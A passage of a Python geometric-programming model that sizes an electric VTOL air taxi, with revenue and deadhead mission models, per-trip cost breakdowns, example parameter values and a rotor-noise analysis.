FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints += [self.flight_segments]
constraints += [self.crew, self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [hoverState]
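#Loiter speed set to (1/3)**(1/4) of cruise speed: the classical minimum-power (best-endurance) speed ratio for a parabolic drag polar, here taken relative to the cruise speed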
constraints += [V_loiter == ((1/3.)**(1/4.))*V_cruise]
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [T_A == segment.rotorPerf.T_A for i,segment in enumerate(self.hover_segments)]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandRevenueMission(Model):
#Revenue-generating mission. Exactly the same code as OnDemandDeadheadMission.
def setup(self,aircraft,mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
t_mission = Variable("t_{mission}","minutes","Time to complete mission (including charging)")
t_flight = Variable("t_{flight}","minutes","Time in flight")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.V_cruise = V_cruise
self.T_A = T_A
self.C_eff = C_eff
self.t_mission = t_mission
self.t_flight = t_flight
self.E_mission = E_mission
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
self.fs0 = Hover(self,aircraft,hoverState)#takeoff
self.fs1 = LevelFlight(self,aircraft)#fly to destination
self.fs2 = Hover(self,aircraft,hoverState)#landing
self.time_on_ground = TimeOnGround(self)
self.segments = [self.fs0, self.fs1, self.fs2, self.time_on_ground]
self.flight_segments = [self.fs0, self.fs1, self.fs2]
self.levelFlight_segments = [self.fs1]
self.hover_segments = [self.fs0, self.fs2]
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
numHoverSegments = len(self.hover_segments)
with Vectorize(numHoverSegments):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints = []
constraints += [self.fs0.T_A == T_A]
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
constraints += [self.segments]
constraints += [self.crew,self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [p_ratio == self.fs0.rotorPerf.p_ratio]
constraints += hoverState
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [t_flight >= sum(c.t for c in self.flight_segments)]
constraints += [t_mission >= t_flight + self.time_on_ground.t]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandDeadheadMission(Model):
#Deadhead mission. Exactly the same code as OnDemandRevenueMission.
def setup(self,aircraft,mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
t_mission = Variable("t_{mission}","minutes","Time to complete mission (including charging)")
t_flight = Variable("t_{flight}","minutes","Time in flight")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.V_cruise = V_cruise
self.T_A = T_A
self.C_eff = C_eff
self.t_mission = t_mission
self.t_flight = t_flight
self.E_mission = E_mission
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
self.fs0 = Hover(self,aircraft,hoverState)#takeoff
self.fs1 = LevelFlight(self,aircraft)#fly to destination
self.fs2 = Hover(self,aircraft,hoverState)#landing
self.time_on_ground = TimeOnGround(self)
self.segments = [self.fs0, self.fs1, self.fs2, self.time_on_ground]
self.flight_segments = [self.fs0, self.fs1, self.fs2]
self.levelFlight_segments = [self.fs1]
self.hover_segments = [self.fs0, self.fs2]
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
numHoverSegments = len(self.hover_segments)
with Vectorize(numHoverSegments):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints = []
constraints += [self.fs0.T_A == T_A]
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
constraints += [self.segments]
constraints += [self.crew,self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [p_ratio == self.fs0.rotorPerf.p_ratio]
constraints += hoverState
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [t_flight >= sum(c.t for c in self.flight_segments)]
constraints += [t_mission >= t_flight + self.time_on_ground.t]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandMissionCost(Model):
#Includes both revenue and deadhead missions
def setup(self,aircraft,revenue_mission,deadhead_mission):
N_passengers = revenue_mission.passengers.N_passengers
trip_distance = revenue_mission.mission_range
cpt = Variable("cost_per_trip","-","Cost (in dollars) for one trip")
cpt_revenue = Variable("revenue_cost_per_trip","-",
"Portion of the cost per trip incurred during the revenue-generating flights")
cpt_deadhead = Variable("deadhead_cost_per_trip","-",
"Portion of the cost per trip incurred during the deadhead flights")
cptpp = Variable("cost_per_trip_per_passenger","-",
"Cost (in dollars) for one trip, per passenger carried on revenue trip")
cpt_seat_mile = Variable("cost_per_seat_mile","mile**-1",
"Cost per trip, per seat (passenger) mile")
deadhead_ratio = Variable("deadhead_ratio","-","Number of deadhead missions per total missions")
NdNr = Variable("N_{deadhead}/N_{typical}","-",
"Number of deadhead missions per typical mission")
revenue_mission_costs = RevenueMissionCost(aircraft,revenue_mission)
deadhead_mission_costs = DeadheadMissionCost(aircraft,deadhead_mission)
self.cpt = cpt
self.cpt_revenue = cpt_revenue
self.cpt_deadhead = cpt_deadhead
self.cptpp = cptpp
self.cpt_seat_mile = cpt_seat_mile
self.deadhead_ratio = deadhead_ratio
self.NdNr = NdNr
self.revenue_mission_costs = revenue_mission_costs
self.deadhead_mission_costs = deadhead_mission_costs
constraints = []
constraints += [revenue_mission_costs, deadhead_mission_costs]
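#GP-compatible rearrangement of NdNr == deadhead_ratio/(1 - deadhead_ratio), since deadhead_ratio == NdNr/(NdNr + 1)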
constraints += [NdNr >= deadhead_ratio*(NdNr+1)]
constraints += [cpt_revenue == revenue_mission_costs.cost_per_mission]
constraints += [cpt_deadhead == NdNr*deadhead_mission_costs.cost_per_mission]
constraints += [cpt >= cpt_revenue + cpt_deadhead]
constraints += [cpt == cptpp*N_passengers]
constraints += [cpt == cpt_seat_mile*N_passengers*trip_distance]
return constraints
class RevenueMissionCost(Model):
#Cost for one mission. Exactly the same code as DeadheadMissionCost.
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_mission = Variable("cost_per_mission","-","Cost per mission")
cost_per_time = Variable("cost_per_time","hr**-1","Cost per unit mission time")
capital_expenses = CapitalExpenses(aircraft,mission)
operating_expenses = OperatingExpenses(aircraft,mission)
expenses = [capital_expenses, operating_expenses]
self.cost_per_mission = cost_per_mission
self.cost_per_time = cost_per_time
self.capital_expenses = capital_expenses
self.operating_expenses = operating_expenses
constraints = []
constraints += [expenses]
constraints += [cost_per_mission >= sum(c.cost_per_mission for c in expenses)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class DeadheadMissionCost(Model):
#Cost for one mission. Exactly the same code as RevenueMissionCost.
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_mission = Variable("cost_per_mission","-","Cost per mission")
cost_per_time = Variable("cost_per_time","hr**-1","Cost per unit mission time")
capital_expenses = CapitalExpenses(aircraft,mission)
operating_expenses = OperatingExpenses(aircraft,mission)
expenses = [capital_expenses, operating_expenses]
self.cost_per_mission = cost_per_mission
self.cost_per_time = cost_per_time
self.capital_expenses = capital_expenses
self.operating_expenses = operating_expenses
constraints = []
constraints += [expenses]
constraints += [cost_per_mission >= sum(c.cost_per_mission for c in expenses)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class VehicleAcquisitionCost(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
purchase_price = aircraft.purchase_price
vehicle_life = aircraft.vehicle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized vehicle purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized vehicle acquisition cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == purchase_price/vehicle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class AvionicsAcquisitionCost(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
purchase_price = aircraft.avionics.purchase_price
vehicle_life = aircraft.vehicle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized avionics purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized avionics acquisition cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == purchase_price/vehicle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class BatteryAcquisitionCost(Model):
def setup(self,battery,mission):
t_mission = mission.t_mission
purchase_price = battery.purchase_price
cycle_life = battery.cycle_life
cost_per_time = Variable("cost_per_time","hr**-1",
"Amortized battery purchase price per unit mission time")
cost_per_mission = Variable("cost_per_mission","-",
"Amortized battery cost per mission")
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
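#The battery is amortized per charge cycle: each mission is assumed to consume one cycle of the battery's cycle life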
constraints += [cost_per_mission == purchase_price/cycle_life]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class CapitalExpenses(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_time = Variable("cost_per_time","hr**-1","Capital expenses per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Capital expenses per mission")
vehicle_cost = VehicleAcquisitionCost(aircraft,mission)
avionics_cost = AvionicsAcquisitionCost(aircraft,mission)
battery_cost = BatteryAcquisitionCost(aircraft.battery,mission)
self.costs = [vehicle_cost, avionics_cost, battery_cost]
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
self.vehicle_cost = vehicle_cost
self.avionics_cost = avionics_cost
self.battery_cost = battery_cost
constraints = []
constraints += [self.costs]
constraints += [cost_per_mission >= sum(c.cost_per_mission for c in self.costs)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class PilotCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
wrap_rate = Variable("wrap_rate","hr**-1",
"Cost per pilot, per unit mission time (including benefits and overhead)")
cost_per_time = Variable("cost_per_time","hr**-1","Pilot cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Pilot cost per mission")
self.wrap_rate = wrap_rate
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
if mission.mission_type == "autonomous":
aircraft_per_bunker_pilot = Variable("aircraft_per_bunker_pilot",8,"-",
"Number of aircraft controlled by 1 bunker pilot (assuming no crew on board)")
constraints += [cost_per_time == wrap_rate/aircraft_per_bunker_pilot]
if mission.mission_type == "piloted":
pilots_per_aircraft = Variable("pilots_per_aircraft",1.5,"-",
"Pilots per aircraft (assuming crew on board)")
constraints += [cost_per_time == wrap_rate*pilots_per_aircraft]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class MaintenanceCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
MMH_FH = Variable("MMH_FH","-","Maintenance man-hours per flight hour")
wrap_rate = Variable("wrap_rate","hr**-1",
"Cost per mechanic, per unit maintenance time (including benefits and overhead)")
cost_per_time = Variable("cost_per_time","hr**-1","Maintenance cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Maintenance cost per mission")
self.MMH_FH = MMH_FH
self.wrap_rate = wrap_rate
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_time == MMH_FH*wrap_rate]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class EnergyCost(Model):
def setup(self,mission):
t_mission = mission.t_mission
E_charger = mission.time_on_ground.E_charger
cost_per_energy = Variable("cost_per_energy",0.12,"kWh**-1","Price of electricity")
cost_per_time = Variable("cost_per_time","hr**-1","Energy cost per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Energy cost per mission")
self.cost_per_energy = cost_per_energy
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_mission == E_charger*cost_per_energy]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class IndirectOperatingCost(Model):
def setup(self,operating_expenses):
IOC_fraction = Variable("IOC_fraction",0.12,"-","IOC as a fraction of DOC")
cost_per_time = Variable("cost_per_time","hr**-1","IOC per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","IOC per mission")
self.IOC_fraction = IOC_fraction
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
constraints = []
constraints += [cost_per_mission == IOC_fraction*operating_expenses.DOC]
constraints += [cost_per_time == IOC_fraction*operating_expenses.DOC_per_time]
return constraints
class OperatingExpenses(Model):
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_time = Variable("cost_per_time","hr**-1","Operating expenses per unit mission time")
cost_per_mission = Variable("cost_per_mission","-","Operating expenses per mission")
DOC = Variable("DOC","-","Direct operating cost per mission")
DOC_per_time = Variable("DOC_per_time","hr**-1","Direct operating cost per unit mission time")
IOC = Variable("IOC","-","Indirect operating cost per mission")
IOC_per_time = Variable("IOC_per_time","hr**-1","Indirect operating cost per unit mission time")
self.DOC = DOC
self.DOC_per_time = DOC_per_time
self.IOC = IOC
self.IOC_per_time = IOC_per_time
self.cost_per_time = cost_per_time
self.cost_per_mission = cost_per_mission
pilot_cost = PilotCost(mission)
maintenance_cost = MaintenanceCost(mission)
energy_cost = EnergyCost(mission)
indirect_operating_cost = IndirectOperatingCost(self)
self.pilot_cost = pilot_cost
self.maintenance_cost = maintenance_cost
self.energy_cost = energy_cost
self.indirect_operating_cost = indirect_operating_cost
constraints = []
constraints += [pilot_cost, maintenance_cost, energy_cost, indirect_operating_cost]
constraints += [DOC >= pilot_cost.cost_per_mission
+ maintenance_cost.cost_per_mission + energy_cost.cost_per_mission]
constraints += [DOC_per_time == DOC/t_mission]
constraints += [IOC == indirect_operating_cost.cost_per_mission]
constraints += [IOC_per_time == indirect_operating_cost.cost_per_time]
constraints += [cost_per_mission >= DOC + IOC]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
def test():
#String inputs
reserve_type="FAA_heli"
sizing_mission_type="piloted"
revenue_mission_type="piloted"
deadhead_mission_type="autonomous"
problem_subDict = {}
Aircraft = OnDemandAircraft(autonomousEnabled=True)
problem_subDict.update({
Aircraft.L_D_cruise: 14., #estimated L/D in cruise
Aircraft.eta_cruise: 0.85, #propulsive efficiency in cruise
Aircraft.tailRotor_power_fraction_hover: 0.001,
Aircraft.tailRotor_power_fraction_levelFlight: 0.001,
Aircraft.cost_per_weight: 350*ureg.lbf**-1, #vehicle cost per unit empty weight
Aircraft.battery.C_m: 400*ureg.Wh/ureg.kg, #battery energy density
Aircraft.battery.cost_per_C: 400*ureg.kWh**-1, #battery cost per unit energy capacity
Aircraft.rotors.N: 12, #number of propellers
Aircraft.rotors.Cl_mean_max: 1.0, #maximum allowed mean lift coefficient
Aircraft.structure.weight_fraction: 0.55, #empty weight fraction
Aircraft.electricalSystem.eta: 0.9, #electrical system efficiency
})
SizingMission = OnDemandSizingMission(Aircraft,mission_type=sizing_mission_type,
reserve_type=reserve_type)
problem_subDict.update({
SizingMission.mission_range: 87*ureg.nautical_mile,#mission range
SizingMission.V_cruise: 200*ureg.mph,#cruising speed
SizingMission.t_hover: 120*ureg.s,#hover time
SizingMission.T_A: 15.*ureg("lbf")/ureg("ft")**2,#disk loading
SizingMission.passengers.N_passengers: 3,#Number of passengers
})
RevenueMission = OnDemandRevenueMission(Aircraft,mission_type=revenue_mission_type)
problem_subDict.update({
RevenueMission.mission_range: 30*ureg.nautical_mile,#mission range
RevenueMission.V_cruise: 200*ureg.mph,#cruising speed
RevenueMission.t_hover: 30*ureg.s,#hover time
RevenueMission.passengers.N_passengers: 2,#Number of passengers
RevenueMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
DeadheadMission = OnDemandDeadheadMission(Aircraft,mission_type=deadhead_mission_type)
problem_subDict.update({
DeadheadMission.mission_range: 30*ureg.nautical_mile,#mission range
DeadheadMission.V_cruise: 200*ureg.mph,#cruising speed
DeadheadMission.t_hover: 30*ureg.s,#hover time
DeadheadMission.passengers.N_passengers: 0.001,#Number of passengers
DeadheadMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
MissionCost = OnDemandMissionCost(Aircraft,RevenueMission,DeadheadMission)
problem_subDict.update({
MissionCost.revenue_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_ratio: 0.2, #deadhead ratio
})
problem = Model(MissionCost["cost_per_trip"],
[Aircraft, SizingMission, RevenueMission, DeadheadMission, MissionCost])
problem.substitutions.update(problem_subDict)
solution = problem.solve(verbosity=0)
return solution
if __name__=="__main__":
#Concept representative analysis
from noise_models import rotational_noise, vortex_noise, noise_weighting
#String inputs
reserve_type="FAA_heli"
sizing_mission_type="piloted"
revenue_mission_type="piloted"
deadhead_mission_type="autonomous"
problem_subDict = {}
Aircraft = OnDemandAircraft(autonomousEnabled=True)
problem_subDict.update({
Aircraft.L_D_cruise: 14., #estimated L/D in cruise
Aircraft.eta_cruise: 0.85, #propulsive efficiency in cruise
Aircraft.tailRotor_power_fraction_hover: 0.001,
Aircraft.tailRotor_power_fraction_levelFlight: 0.001,
Aircraft.cost_per_weight: 350*ureg.lbf**-1, #vehicle cost per unit empty weight
Aircraft.battery.cost_per_C: 400*ureg.kWh**-1, #battery cost per unit energy capacity
Aircraft.rotors.N: 12, #number of propellers
Aircraft.rotors.Cl_mean_max: 1.0, #maximum allowed mean lift coefficient
Aircraft.battery.C_m: 400*ureg.Wh/ureg.kg, #battery energy density
Aircraft.structure.weight_fraction: 0.55, #empty weight fraction
Aircraft.electricalSystem.eta: 0.9, #electrical system efficiency
})
SizingMission = OnDemandSizingMission(Aircraft,mission_type=sizing_mission_type,
reserve_type=reserve_type)
problem_subDict.update({
SizingMission.mission_range: 87*ureg.nautical_mile,#mission range
SizingMission.V_cruise: 200*ureg.mph,#cruising speed
SizingMission.t_hover: 120*ureg.s,#hover time
SizingMission.T_A: 15.*ureg("lbf")/ureg("ft")**2,#disk loading
SizingMission.passengers.N_passengers: 3,#Number of passengers
})
RevenueMission = OnDemandRevenueMission(Aircraft,mission_type=revenue_mission_type)
problem_subDict.update({
RevenueMission.mission_range: 30*ureg.nautical_mile,#mission range
RevenueMission.V_cruise: 200*ureg.mph,#cruising speed
RevenueMission.t_hover: 30*ureg.s,#hover time
RevenueMission.passengers.N_passengers: 2,#Number of passengers
RevenueMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
DeadheadMission = OnDemandDeadheadMission(Aircraft,mission_type=deadhead_mission_type)
problem_subDict.update({
DeadheadMission.mission_range: 30*ureg.nautical_mile,#mission range
DeadheadMission.V_cruise: 200*ureg.mph,#cruising speed
DeadheadMission.t_hover: 30*ureg.s,#hover time
DeadheadMission.passengers.N_passengers: 0.001,#Number of passengers
DeadheadMission.time_on_ground.charger_power: 200*ureg.kW, #Charger power
})
MissionCost = OnDemandMissionCost(Aircraft,RevenueMission,DeadheadMission)
problem_subDict.update({
MissionCost.revenue_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.revenue_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_mission_costs.operating_expenses.pilot_cost.wrap_rate: 70*ureg.hr**-1,#pilot wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.wrap_rate: 60*ureg.hr**-1, #mechanic wrap rate
MissionCost.deadhead_mission_costs.operating_expenses.maintenance_cost.MMH_FH: 0.6, #maintenance man-hours per flight hour
MissionCost.deadhead_ratio: 0.2, #deadhead ratio
})
problem = Model(MissionCost["cost_per_trip"],
[Aircraft, SizingMission, RevenueMission, DeadheadMission, MissionCost])
problem.substitutions.update(problem_subDict)
solution = problem.solve(verbosity=0)
delta_S = 500*ureg.ft
noise_weighting = "A"
B = 5
SPL_dict = {}
missions = ["Sizing","Revenue","Deadhead"]
for mission in missions:
mission_name = "OnDemand" + mission + "Mission"
T_perRotor = solution("T_perRotor_" + mission_name)[0]
R = solution("R")
VT = solution("VT_" + mission_name)[0]
s = solution("s")
Cl_mean = solution("Cl_{mean_{max}}")
N = solution("N")
f_peak, SPL, spectrum = vortex_noise(T_perRotor=T_perRotor,R=R,VT=VT,s=s,
Cl_mean=Cl_mean,N=N,B=B,delta_S=delta_S,h=0*ureg.ft,t_c=0.12,St=0.28,
weighting=noise_weighting)
SPL_dict[mission] = SPL
if (reserve_type == "FAA_aircraft") or (reserve_type == "FAA_heli"):
num = solution("t_{loiter}_OnDemandSizingMission").to(ureg.minute).magnitude
reserve_type_string = " (%0.0f-minute loiter time)" % num
if reserve_type == "Uber":
num = solution("R_{divert}_OnDemandSizingMission").to(ureg.nautical_mile).magnitude
reserve_type_string = " (%0.1f-nmi diversion distance)" % num
print()
print("Concept representative analysis")
print()
print("Battery energy density: %0.0f Wh/kg"
% solution("C_m_OnDemandAircraft/Battery").to(ureg.Wh/ureg.kg).magnitude)
print("Empty weight fraction: %0.4f"
% solution("weight_fraction_OnDemandAircraft/Structure"))
print("Cruise lift-to-drag ratio: %0.1f"
% solution("L_D_cruise_OnDemandAircraft"))
print("Hover disk loading: %0.1f lbf/ft^2"
% solution("T/A_OnDemandSizingMission").to(ureg("lbf/ft**2")).magnitude)
print("Rotor maximum mean lift coefficient: %0.2f"
% solution("Cl_{mean_{max}}_OnDemandAircraft/Rotors"))
print("Cruise propulsive efficiency: %0.2f"
% solution("\eta_{cruise}_OnDemandAircraft"))
print("Electrical system efficiency: %0.2f"
% solution("\eta_OnDemandAircraft/ElectricalSystem"))
print("Observer distance: %0.0f ft" % delta_S.to(ureg.ft).magnitude)
print("Noise weighting type: %s" % noise_weighting)
print()
print("Sizing Mission (%s)" % sizing_mission_type)
